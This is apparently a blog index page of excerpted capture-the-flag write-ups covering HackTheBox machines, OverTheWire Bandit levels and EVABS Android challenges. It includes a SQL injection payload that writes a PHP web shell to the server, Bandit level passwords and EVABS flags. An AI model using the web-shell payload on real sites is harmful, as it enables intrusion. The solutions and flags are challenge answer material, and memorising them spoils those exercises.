Pages

Search

How to improve our TTY

Once we get a reverse shell we usually need to improve the TTY. Here is some tip to do it:

HTB Validation

$ nmap -p- -v 10.10.11.116 Access to http://10.10.11.116 The listbox values are sent to the server into a POST request: username=rffuste&country=Brazil In the response, we get a cookie user This user cookie does not change if multiple requests are performed. SQL Injection We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use. ‘ union select «» INTO OUTFILE ‘/var/www/html/shell.php’– – Now

Bandit CTF Level 16

Level 15 –> 16 bandit15@bandit:~$ echo «BfMYroe26WYalil77FoDi9qh59eK5xNr» | openssl s_client -connect localhost:30001 -ign_eof password = cluFXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 15

Level 14 –> 15 bandit14@bandit:~$ echo «4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e» | nc localhost 30000 password = BfMYXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 14

Level 13 –> 14 bandit13@bandit:~$ ssh bandit14@localhost -i sshkey.privatebandit14@bandit:~$ cd /etc/bandit_pass/bandit14@bandit:/etc/bandit_pass$ cat bandit14 Password = 4wcYXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 13

Level 12 -> 13 bandit12@bandit:~$ ls bandit12@bandit:~$ mkdir /tmp/pepetbandit12@bandit:~$ cp data.txt /tmp/pepetbandit12@bandit:~$ cd /tmp/pepetbandit12@bandit:/tmp/pepet$ ls bandit12@bandit:/tmp/pepet$ file data.txt bandit12@bandit:/tmp/pepet$ xxd -r data.txt > data_xxd_1bandit12@bandit:/tmp/pepet$ file data_xxd_1 bandit12@bandit:/tmp/pepet$ ls bandit12@bandit:/tmp/pepet$ zcat data_xxd_1 > data_zcat_1bandit12@bandit:/tmp/pepet$ file data_zcat_1 bandit12@bandit:/tmp/pepet$ bzip2 -d data_zcat_1 bandit12@bandit:/tmp/pepet$ file data_zcat_1.out bandit12@bandit:/tmp/pepet$ zcat data_zcat_1.out > data_zcat_2bandit12@bandit:/tmp/pepet$ ls bandit12@bandit:/tmp/pepet$ file data_zcat_2 bandit12@bandit:/tmp/pepet$ tar xvf data_zcat_2 bandit12@bandit:/tmp/pepet$ file data5.bin bandit12@bandit:/tmp/pepet$ tar xvf data5.bin bandit12@bandit:/tmp/pepet$ file data6.bin bandit12@bandit:/tmp/pepet$ ls bandit12@bandit:/tmp/pepet$ bzip2 data6.bin.bz2

EVABS Challenge 8

EVABS{nev3r_st0re_s3ns!tiv3_data_1n_7h3_s0urcec0de}

HTB TheNotebook

$ nmap 10.10.10.230 -A -p- -T4 -v http://10.10.10.230/ http://10.10.10.230/register So, a user test exists.What would be the password? test??? Do we have an admin user? http://10.10.10.230/login We can try to log in with our test user. Test notes After login in, we can observe that there is an AUTH Token. We observe that it is a JWT Token. We can decode it using https://jwt.io/  Here we can observe several things: RS256

EVABS Challenge 7

$ adb shell am start -n com.revo.evabs/com.revo.evabs.ExportedActivity EVABS{exp0rted_activities_ar3_harmful}

EVABS Challenge 6

$adb shellvbox86p:/data/data/com.revo.evabs/databases # ls $adb pull /data/data/com.revo.evabs/databases/MAINFRAME_ACCESS . $ ls $ file MAINFRAME_ACCESS EVABS{sqlite_is_not_safe}